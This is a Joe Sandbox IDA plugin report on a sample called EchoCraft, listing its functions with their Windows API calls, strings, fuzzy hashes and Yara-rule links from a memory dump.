Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: FileTime$FindLocal$CloseFirstSystem_wcslen
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 409396820-2428617273
Opcode ID: 990422bf3f0aba74b616cae6b656121eabec6a6fbc4f5ce2ba2cfb0f14f329dc
Instruction ID: 4af47b1eccbd536934e467de0c49d2978b936ea6a1df86b86950e36dabca5283
Opcode Fuzzy Hash: 990422bf3f0aba74b616cae6b656121eabec6a6fbc4f5ce2ba2cfb0f14f329dc
Instruction Fuzzy Hash: 9CA15B71508255AFC714EBA4C985DBFB7ECBF84300F44491DF99587192EB34EA08CBA2

Function 00AED7CC Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 175fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00A850F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A85035,?,?,00AC4641,?,?,00000100,00000000,00000000,CMDLINE), ref: 00A85117

Part of subcall function 00AEE8F5: CompareStringW.KERNEL32(00000400,00000001,?,?,00AED818,?,?,?,?,?,?,00000000), ref: 00AEE947

Part of subcall function 00AEE970: GetFileAttributesW.KERNEL32(?,00AED6EB), ref: 00AEE971

FindFirstFileW.KERNEL32(?,?), ref: 00AED878
CompareStringW.KERNEL32(00000400,00000001,?,?,?,?,?,?,?), ref: 00AED92D
DeleteFileW.KERNEL32(?), ref: 00AED93F
MoveFileW.KERNEL32(?,?), ref: 00AED952
DeleteFileW.KERNEL32(?,?,?,?), ref: 00AED96F
FindNextFileW.KERNEL32(00000000,00000010), ref: 00AED999

Part of subcall function 00AED9FE: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00AED97E,?,?), ref: 00AEDA14

FindClose.KERNEL32(00000000,?,?,?), ref: 00AED9B5
FindClose.KERNEL32(00000000), ref: 00AED9C6

Strings

\*.*, xrefs: 00AED823, 00AED82C, 00AED841

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: File$Find$CloseCompareDeleteString$AttributesCopyFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 597992297-1173974218
Opcode ID: 0c03f9600e717b326474ea8bc65b934af80f3b6dbe13f9f3d9e1a8beb79bb396
Instruction ID: 4015cb093dc0ccd6974a20ed2431ead6206507fe4860962ca5d8a75d857aebd7
Opcode Fuzzy Hash: 0c03f9600e717b326474ea8bc65b934af80f3b6dbe13f9f3d9e1a8beb79bb396
Instruction Fuzzy Hash: 80616A3190519DAECF05FBA1DE929EEB7B9AF14304F204165E442771A2EB34AF09CB61

Function 00AFF5B0 Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00AFF5D7
EmptyClipboard.USER32 ref: 00AFF5DD
GlobalAlloc.KERNEL32(00000002,?), ref: 00AFF5F2
CloseClipboard.USER32 ref: 00AFF6E9

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: bae6528223eaab3f0d8f448b4169e9984d04f29f6705d093bc8eda102e90d745
Instruction ID: a45358d5376c258390c46eff1c0d05a4989e6dcc1e0093856b9012249c9086f8
Opcode Fuzzy Hash: bae6528223eaab3f0d8f448b4169e9984d04f29f6705d093bc8eda102e90d745
Instruction Fuzzy Hash: 4241A931204651AFD720DF65D888F65BBA0EF44369F14C0A9F52ACB6B2CB75ED42CB90

Function 00AEF0CD Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00AE1F3D: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00AE1F87
Part of subcall function 00AE1F3D: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00AE1FB4
Part of subcall function 00AE1F3D: GetLastError.KERNEL32 ref: 00AE1FC4

ExitWindowsEx.USER32(?,00000000), ref: 00AEF109

Strings

, xrefs: 00AEF133
@, xrefs: 00AEF0FC
SeShutdownPrivilege, xrefs: 00AEF0D9
, xrefs: 00AEF0F7

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $ $@$SeShutdownPrivilege
API String ID: 2234035333-3163812486
Opcode ID: b53eaf8f43c98c90afa68f39ef37d84715f70d821a6368a0af7015d118f41751
Instruction ID: aa93108559566ebd1a1f50b8ade2fe433616526974801e83aae9265aeba6911e
Opcode Fuzzy Hash: b53eaf8f43c98c90afa68f39ef37d84715f70d821a6368a0af7015d118f41751
Instruction Fuzzy Hash: 1B01D6727112A4AFEB2467BADC9ABBE726CDB04344F554531FE12E31D2DA605D4081A0

Function 00B01A4A Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00B01ABC
WSAGetLastError.WSOCK32 ref: 00B01AC9
bind.WSOCK32(00000000,?,00000010), ref: 00B01B00
WSAGetLastError.WSOCK32 ref: 00B01B0B
closesocket.WSOCK32(00000000), ref: 00B01B3A
listen.WSOCK32(00000000,00000005), ref: 00B01B49
WSAGetLastError.WSOCK32 ref: 00B01B53
closesocket.WSOCK32(00000000), ref: 00B01B82

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: ErrorLast$closesocket$bindlistensocket
String ID:
API String ID: 540024437-0
Opcode ID: 8dff2edae813af8fb97e4d7598b3e3024a9ce69de8109a39ea6360660bef60f9
Instruction ID: 95b79fa32df798c78b47492ae9b9f57f9b7a1aae77a7306b2ab8b254b60991ac
Opcode Fuzzy Hash: 8dff2edae813af8fb97e4d7598b3e3024a9ce69de8109a39ea6360660bef60f9
Instruction Fuzzy Hash: E6414B316002409FD714DF68C584B6ABBE5FF46328F188598E8569F2D2CB71ED85CBE1

Function 00AEDB0B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00A850F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A85035,?,?,00AC4641,?,?,00000100,00000000,00000000,CMDLINE), ref: 00A85117

Part of subcall function 00AEE970: GetFileAttributesW.KERNEL32(?,00AED6EB), ref: 00AEE971

FindFirstFileW.KERNEL32(?,?), ref: 00AEDB82
DeleteFileW.KERNEL32(?,?,?,?), ref: 00AEDBD2
FindNextFileW.KERNEL32(00000000,00000010), ref: 00AEDBE3
FindClose.KERNEL32(00000000), ref: 00AEDBFA
FindClose.KERNEL32(00000000), ref: 00AEDC03

Strings

\*.*, xrefs: 00AEDB54

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: 4216f994d6831be8771184c4f45323cf5c9be44f05946c77238122f7b8747a82
Instruction ID: 6088ee109d0f3b289a88ca8e65ee01f4ec85a781440dd20577ae7c890bffe0de
Opcode Fuzzy Hash: 4216f994d6831be8771184c4f45323cf5c9be44f05946c77238122f7b8747a82
Instruction Fuzzy Hash: 82312A31018385ABC305FF64DA958AFB7E8BE95304F444E1DF4E5931A1EB64DA09CBA3

Function 00AF38E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00AC3BC0,?,?,00000000,00000000), ref: 00AF38F0
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00AC3BC0,?,?,00000000,00000000), ref: 00AF3907
LoadResource.KERNEL32(?,00000000,?,?,00AC3BC0,?,?,00000000,00000000,?,?,?,?,?,?,00A82C35), ref: 00AF3917
SizeofResource.KERNEL32(?,00000000,?,?,00AC3BC0,?,?,00000000,00000000,?,?,?,?,?,?,00A82C35), ref: 00AF3928
LockResource.KERNEL32(00AC3BC0,?,?,00AC3BC0,?,?,00000000,00000000,?,?,?,?,?,?,00A82C35,?), ref: 00AF3937

Strings

SCRIPT, xrefs: 00AF38FD

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: f2672e0b006a4f37c93f945f74c2b9c85dd306ff82f1e3e4b519ff2e45b93999
Instruction ID: d7d1d3d1b495e246470796ca13b7b19230dc71ef2b642abf76d04f1e40ee0fa0
Opcode Fuzzy Hash: f2672e0b006a4f37c93f945f74c2b9c85dd306ff82f1e3e4b519ff2e45b93999
Instruction Fuzzy Hash: 13118E71201705BFDB218B69DC88F67BBB9EBC5B50F148168B612D7260DFB1ED008A60

Function 00AE20EE Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00AE20F9
UnloadUserProfile.USERENV(?,?), ref: 00AE2105
CloseHandle.KERNEL32(?), ref: 00AE210E
CloseHandle.KERNEL32(?), ref: 00AE2116
GetProcessHeap.KERNEL32(00000000,?), ref: 00AE211F
HeapFree.KERNEL32(00000000), ref: 00AE2126

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 5e3b2bc2a355d1f252d484e604ec81d95c62020da7945f3b6e9d13ac811704d7
Instruction ID: 5d510e214364ff4fbd292b860d083a127f252c42d4cf16d68793d288e9d88b4e
Opcode Fuzzy Hash: 5e3b2bc2a355d1f252d484e604ec81d95c62020da7945f3b6e9d13ac811704d7
Instruction Fuzzy Hash: 76E0E576004105BBDB011FA1EC0C98AFF39FF49322B908220F225930B0CF329430DB50

Function 00AFA32C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00A8C110: _wcslen.LIBCMT ref: 00A8C11A

FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00AFA379
FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00AFA48C

Part of subcall function 00AF418B: GetInputState.USER32 ref: 00AF41E2
Part of subcall function 00AF418B: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00AF427D

Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00AFA3A9
FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00AFA476

Strings

*.*, xrefs: 00AFA35E

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
String ID: *.*
API String ID: 1972594611-438819550
Opcode ID: 032a21f1eed0b8cc46f41fb6ef8c9d7b527a93ae01a7ae7650b8f4763dcdcc93
Instruction ID: 43a4b96fa6a14b41d3469d0c5240d5b241d6c3fc93bc7166c0669c29b0eec8b9
Opcode Fuzzy Hash: 032a21f1eed0b8cc46f41fb6ef8c9d7b527a93ae01a7ae7650b8f4763dcdcc93
Instruction Fuzzy Hash: C64182B190020E9FCF10EFA4D949AEEBBB4EF15311F604156F919A3291DB709E44CB61

Function 00A821FD Relevance: 7.8, APIs: 5, Instructions: 309COMMON

Download Yara Rule

APIs

DefDlgProcW.USER32(?,?), ref: 00A8228E
GetSysColor.USER32(0000000F), ref: 00A82363
SetBkColor.GDI32(?,00000000), ref: 00A82376

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Color$Proc
String ID:
API String ID: 929743424-0
Opcode ID: ac78a3a8c42768e747704453ca6542e8c606ba031235e65f0e5e1939b7bf6d81
Instruction ID: c408d8d72624304e4bd4fd3d11a4ddb2d99a27f0297b1fddfd13cd6bb673a63c
Opcode Fuzzy Hash: ac78a3a8c42768e747704453ca6542e8c606ba031235e65f0e5e1939b7bf6d81
Instruction Fuzzy Hash: AA812571204484BEEA297B3C4C68FFF25ADDB87300B56822DF542CE292CD199E41D772

Function 00B0204C Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00B03821: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00B0384D
Part of subcall function 00B03821: _wcslen.LIBCMT ref: 00B0386E

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00B020A3
WSAGetLastError.WSOCK32 ref: 00B020CA
bind.WSOCK32(00000000,?,00000010), ref: 00B02121
WSAGetLastError.WSOCK32 ref: 00B0212C
closesocket.WSOCK32(00000000), ref: 00B0215B

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
String ID:
API String ID: 1601658205-0
Opcode ID: bf0aa11f8c67940093e1612914fbee73d4b65c73868e4660b025b25c9c625b61
Instruction ID: d095b6d551fd959ddf92f0d16ce4fbb7a7477b01f2968a0ea2c67e2650f1c2cc
Opcode Fuzzy Hash: bf0aa11f8c67940093e1612914fbee73d4b65c73868e4660b025b25c9c625b61
Instruction Fuzzy Hash: 1951C271A00210AFDB10AF24C98AF6A7BE5EB04714F048098F9166F3D3DB75AD41CBE1

Function 00B1231B Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00B1239A
IsWindowEnabled.USER32 ref: 00B123A8
GetForegroundWindow.USER32(?,?,00000001,?), ref: 00B123B5
IsIconic.USER32 ref: 00B123C3
IsZoomed.USER32 ref: 00B123D1

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: b445b56d3ef816f9d97b7bfe804cf1f761e8d97e383b86cf6ff85a062657da86
Instruction ID: be217f015145bdf421b0beeaec1bc8c7a32b13339d3d64bc2bb85063284977a4
Opcode Fuzzy Hash: b445b56d3ef816f9d97b7bfe804cf1f761e8d97e383b86cf6ff85a062657da86
Instruction Fuzzy Hash: 3D21F7317002005FD7109F26E844B9A7BE9FF85314F9880ACE85ACB351DB79DD92CBA4

Function 00AFD672 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,00000400,?), ref: 00AFD6B7
GetLastError.KERNEL32(?,00000000), ref: 00AFD718
SetEvent.KERNEL32(?,?,00000000), ref: 00AFD72C

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: ErrorEventFileInternetLastRead
String ID:
API String ID: 234945975-0
Opcode ID: 4b04b7a0a022b1d654ad89954cfd6fbff518737c302f632b85b2783fc79d01d5
Instruction ID: 5f38dd6175ee15797bbd3ad29fc26a2986a1d21dc88ff87e97fe7728251cbab9
Opcode Fuzzy Hash: 4b04b7a0a022b1d654ad89954cfd6fbff518737c302f632b85b2783fc79d01d5
Instruction Fuzzy Hash: 03218E71500709AFD721EFA5C984BAAB7F9EB40314F50841AF646D7151EB70EA05DB50

Function 00ADE3BB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00ADE3BF

Strings

%.3d, xrefs: 00ADE3CA
X64, xrefs: 00ADE447

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: LocalTime
String ID: %.3d$X64
API String ID: 481472006-1077770165
Opcode ID: b32311f84eef8f1610b7218ef3198393506d04cf593c3ab799e046c800b6169f
Instruction ID: 99bfe85c756ce5737998acab806817dba3fa54087b814cb13798153c95bc11c0
Opcode Fuzzy Hash: b32311f84eef8f1610b7218ef3198393506d04cf593c3ab799e046c800b6169f
Instruction Fuzzy Hash: 95D012B5905119D9CF90E7908D888FD73BCB708700F608463F507D6101D6358604A722

Function 00AB29B2 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00AB2AAA
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00AB2AB4
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00AB2AC1

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: f7209d6487fda88d70a7d623927e64c582379b6504a5abecc8faca57df5fd36c
Instruction ID: 1ea3f52963618da803a4439af62cae252826ce9148b20218db6ffa7c7b57436e
Opcode Fuzzy Hash: f7209d6487fda88d70a7d623927e64c582379b6504a5abecc8faca57df5fd36c
Instruction Fuzzy Hash: 7331D37490121C9BCB21DF68D988BDDBBB8BF08310F5041DAE41CA72A1EB749F858F45

Function 00AEEB90 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 00AEEBC4

Strings

DOWN, xrefs: 00AEEBA9

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: mouse_event
String ID: DOWN
API String ID: 2434400541-711622031
Opcode ID: 08aef53dc00da9c6e5bbaed7a085cdfbaa9ad0206c78b0ccffa287d267f027b7
Instruction ID: 492cf1c9ac3fec1edc955eb8a227339c2f214f2838722e07a6a61419cb7cec1f
Opcode Fuzzy Hash: 08aef53dc00da9c6e5bbaed7a085cdfbaa9ad0206c78b0ccffa287d267f027b7
Instruction Fuzzy Hash: C0E08C2A29D7A13CB9542269BC02DF7038CAB27734B218286F811E60C0EE851D8260A8

Function 00ADE419 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 00ADE42B

Strings

X64, xrefs: 00ADE447

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: NameUser
String ID: X64
API String ID: 2645101109-893830106
Opcode ID: bea0e835a2867820533703eb96f8cbe99ff7ce003d778000efe5f7608422006c
